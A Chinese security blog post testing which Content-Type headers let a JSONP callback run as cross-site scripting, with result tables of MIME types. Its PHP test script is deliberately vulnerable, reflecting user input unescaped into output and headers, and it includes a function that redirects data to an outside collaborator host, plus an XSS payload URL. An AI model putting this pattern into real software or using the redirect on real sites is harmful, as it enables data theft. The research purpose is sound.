

Learning Man's Blog

Learning Man's Blog

JSONP Content-Type 简单Fuzz



JSONP Content-Type 简单Fuzz

字数统计: 584阅读时长: 3 min

 2019/03/18  Share

• 
• 
• 
• 
• 

测试代码

// http://10.211.55.8/jsonx.php?callback=%3Cscript%3Ealert(1)%3C/script%3E&content_type=text/vnd.wap.wml
<?php
echo "<script>function test(cc){location='http://m2pybxdae******9m4fff8dwlnrdf2.burpcollaborator.net/payload='+cc;}</script>";
$content_type=$_GET['content_type'];
//print "Use Content-type '".$content_type."'\n";
header("X-XSS-Protection: 0;");
header("Content-Type: ".$content_type);
$callback = $_GET['callback'];
print $callback . '({"id" : "1","name" : "Sariel.D"});';
?>

测试结果

1. 支持xss

列表

Name	Template	Reference
html	text/html	[W3C][Robin_Berjon]

效果

2. 返回内容

列表

Name	Template	Reference
ecmascript	application/ecmascript	[RFC4329]
javascript	application/javascript	[RFC4329]
json	application/json	[RFC8259]
1d-interleaved-parityfec	text/1d-interleaved-parityfec	[RFC6015]
cache-manifest	text/cache-manifest	[W3C][Robin_Berjon]
css	text/css	[RFC2318]
csv-schema	text/csv-schema	[National_Archives_UK][David_Underdown]
dns	text/dns	[RFC4027]
ecmascript - OBSOLETED in favor of application/ecmascript	text/ecmascript	[RFC4329]
encaprtp	text/encaprtp	[RFC6849]
example	text/example	[RFC4735]
fwdred	text/fwdred	[RFC6354]
grammar-ref-list	text/grammar-ref-list	[RFC6787]
javascript - OBSOLETED in favor of application/javascript	text/javascript	[RFC4329]
jcr-cnd	text/jcr-cnd	[Peeter_Piegaze]
markdown	text/markdown	[RFC7763]
n3	text/n3	[W3C][Eric_Prudhommeaux]
parameters	text/parameters	[RFC7826]
provenance-notation	text/provenance-notation	[W3C][Ivan_Herman]
prs.fallenstein.rst	text/prs.fallenstein.rst	[Benja_Fallenstein]
prs.lines.tag	text/prs.lines.tag	[Benja_Fallenstein]
text/prs.prop.logic	text/prs.prop.logic	[Hans-Dieter_A._Hiep]
raptorfec	text/raptorfec	[RFC6682]
RED	text/RED	[RFC4102]
rfc822-headers	text/rfc822-headers	[RFC6522]
rtp-enc-aescm128	text/rtp-enc-aescm128	[_3GPP]
rtploopback	text/rtploopback	[RFC6849]
rtx	text/rtx	[RFC4588]
sgml	text/sgml	[RFC1874]
strings	text/strings	[IEEE-ISTO-PWG-PPP]
t140	text/t140	[RFC4103]
troff	text/troff	[RFC4263]
turtle	text/turtle	[W3C][Eric_Prudhommeaux]
ulpfec	text/ulpfec	[RFC5109]
uri-list	text/uri-list	[RFC2483]
vnd.a	text/vnd.a	[Regis_Dehoux]
vnd.abc	text/vnd.abc	[Steve_Allen]
vnd.ascii-art	text/vnd.ascii-art	[Kim_Scarborough]
vnd.curl	text/vnd.curl	[Robert_Byrnes]
vnd.debian.copyright	text/vnd.debian.copyright	[Charles_Plessy]
vnd.DMClientScript	text/vnd.DMClientScript	[Dan_Bradley]
vnd.dvb.subtitle	text/vnd.dvb.subtitle	[Peter_Siebert][Michael_Lagally]
vnd.esmertec.theme-descriptor	text/vnd.esmertec.theme-descriptor	[Stefan_Eilemann]
vnd.fly	text/vnd.fly	[John-Mark_Gurney]
vnd.fmi.flexstor	text/vnd.fmi.flexstor	[John-Mark_Gurney]
vnd.graphviz	text/vnd.graphviz	[John_Ellson]
vnd.hgl	text/vnd.hgl	[Heungsub_Lee]
vnd.in3d.3dml	text/vnd.in3d.3dml	[Michael_Powers]
vnd.in3d.spot	text/vnd.in3d.spot	[Michael_Powers]
vnd.IPTC.NewsML	text/vnd.IPTC.NewsML	[IPTC]
vnd.IPTC.NITF	text/vnd.IPTC.NITF	[IPTC]
vnd.latex-z	text/vnd.latex-z	[Mikusiak_Lubos]
vnd.motorola.reflex	text/vnd.motorola.reflex	[Mark_Patton]
vnd.ms-mediapackage	text/vnd.ms-mediapackage	[Jan_Nelson]
vnd.net2phone.commcenter.command	text/vnd.net2phone.commcenter.command	[Feiyu_Xie]
vnd.senx.warpscript	text/vnd.senx.warpscript	[Pierre_Papin]
vnd.si.uricatalogue - OBSOLETED by request	text/vnd.si.uricatalogue	[Nicholas_Parks_Young]
vnd.trolltech.linguist	text/vnd.trolltech.linguist	[David_Lee_Lambert]
vnd.wap.si	text/vnd.wap.si	[WAP-Forum]
vnd.wap.wml	text/vnd.wap.wml	[Peter_Stark]
vnd.wap.wmlscript	text/vnd.wap.wmlscript	[Peter_Stark]

效果

3. 返回内容但浏览器尝试解析导致异常

列表

Name	Template	Reference
ogg	application/ogg	[RFC5334][RFC7845]
pdf	application/pdf	[RFC8118]
xml	application/xml	[RFC7303]
xml	text/xml	[RFC7303]
mp4	audio/mp4	[RFC4337][RFC6381]
mpeg	audio/mpeg	[RFC3003]
ogg	audio/ogg	[RFC5334][RFC7845]
bmp	image/bmp	[RFC7903]
png	image/png	[Glenn_Randers-Pehrson]
vnd.microsoft.icon	image/vnd.microsoft.icon	[Simon_Butcher]
x-mixed-replace	multipart/x-mixed-replace	[W3C][Robin_Berjon]

效果

原文作者：Sariel.D

原文链接：https://blog.sari3l.com/posts/1b4ade61/

发表日期：March 18th 2019, 7:17:06 pm

更新日期：July 6th 2020, 5:52:06 pm

版权声明：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  0CTF/TCTF 2019 WEB writeup
• Previous Post
  JNDI/LADP 学习

Powered by Hexotheme Archer

CATALOG

1. 1. 测试代码
2. 2. 测试结果

• Archive
• Tag
• Cate

Total : 78

2022

• 06/08 Confluence CVE-2022-26134 解析

2021

• 12/30 CodeQL 学习小记 Log4j
• 12/27 CodeQL 学习小记
• 12/14 Log4shell 小记

2020

• 09/15 深信服 SSL VPN Nday - Pre Auth 任意密码重置
• 09/15 深信服 SSL VPN Nday - Pre Auth 修改绑定手机
• 09/12 深信服 SSL VPN Nday - RCE
• 08/26 深信服 SSL VPN Nday - Pre Auth
• 08/23 Shiro-055 分析&回显
• 08/18 深信服 EDR RCE 简析
• 08/04 CobaltStrike Argue 原理 - 翻译文
• 08/02 Github Page 加速
• 07/31 CobaltStrike 破解步骤
• 07/13 一道题回顾智能合约 Coverage
• 07/06 F5 BIG-IP RCE简单分析
• 06/17 用友NC反序列化 简单分析
• 06/14 Pwnable.kr 之 Toddler's Bottle
• 04/01 Weblogic T3 协议学习
• 03/20 CVE-2020-2551 简单分析
• 03/12 CVE-2020-2555 简单分析
• 03/02 Java 反弹 Shell
• 02/26 Thinkphp 5.0.x 反序列化简析
• 02/22 CVE-2020-1938（Ghost Cat）简单分析
• 01/17 JDBC Deserialization
• 01/16 Abusing MySQL clients RCE
• 01/01 2020 All is New

2019

• 12/25 对 Cookie 的一点学习
• 12/18 HTTP Smuggling Attack 随笔
• 12/10 ThinkPHP 6.0.x 反序列化简析
• 12/07 ThinkPHP 5.1.x 反序列化简析
• 10/31 记
• 09/12 Mysql 注入基础小结
• 09/03 XSS with ServiceWorkers
• 08/23 CSP 小结
• 08/07 SVG with HTML Parsing
• 08/06 Fastjson 新反序列化漏洞解析
• 07/16 SSRF 小结
• 07/13 Discuz! ML 3.x 命令执行简析
• 07/10 Redis Rce 简析
• 07/02 Sqlmap --os-shell 原理简析
• 06/15 Active Directory Recon 初步学习
• 05/21 RCTF 2019 WEB writeup
• 05/09 Jenkins CVE-2018-1000861 学习
• 05/07 *CTF 2019 homebrewEvtLoop
• 04/27 Web(CTF)中的密码学 (一)
• 04/19 Abusing MySQL Clients 学习
• 04/12 DDCTF 2019 部分 writeup
• 03/30 0CTF/TCTF 2019 WEB writeup
• 03/18 JSONP Content-Type 简单Fuzz
• 03/10 JNDI/LADP 学习
• 03/07 Fastjson 反序列化漏洞研究
• 03/06 SMTP 25 端口测试记录
• 02/06 pyppeteer 学习记录
• 01/31 Python 多线程、多进程、协程(未完结)
• 01/29 Frida —— WeChat(二) 🧧
• 01/25 动态调试 with smali
• 01/24 Nexus 解决显示 “无法访问互联网”
• 01/19 Frida —— WeChat(一) 🎲
• 01/16 Frida —— 初体验
• 01/01 关系爬虫 —— Weibo
• 01/01 2019 All For One

2018

• 12/30 OpenCV 初接触
• 12/24 验证码破解系列 —— 数美
• 12/21 Chrome Extensions —— fir.im Downloader 编写
• 12/19 XXE 小结
• 12/14 Burp Extensions —— RSA Plugin 编写
• 12/01 CODE BREAKING
• 11/23 Hello World
• 11/08 OGNL Payload
• 11/06 s2-016 漏洞分析
• 11/02 s2-032 漏洞分析
• 10/31 s2-033 & s2-037 漏洞分析
• 10/26 s2-045 漏洞分析
• 10/17 s2-046 漏洞分析
• 10/16 s2-048 漏洞分析
• 10/11 s2-048 漏洞分析
• 10/09 s2-053 漏洞分析
• 10/08 s2-057 漏洞分析

 Mysql  RCE  ctf  writeup  随笔  内网  RedTeam  代码审计  PHP  Burp suite  coding  extension  Weblogic  Deserialize  Tomcat  LFI  Chrome  cobaltstirke  Discuz  CodeQL  F5  CVE-2020-5902  漏洞分析  fastjson  Frida  java  jenkins  SQLi  struts  Redis  SSRF  ThinkPHP  XXE  xss  OpenCV  spider  smali  智能合约  深信服  Nday  hw2020  CAPTCHA  pwn



缺失模块，请参考主题文档进行安装配置：https://github.com/fi3ework/hexo-theme-archer#%E5%AE%89%E8%A3%85%E4%B8%BB%E9%A2%98

 代码审计  编程  Pentest  渗透  逆向  其他  验证码

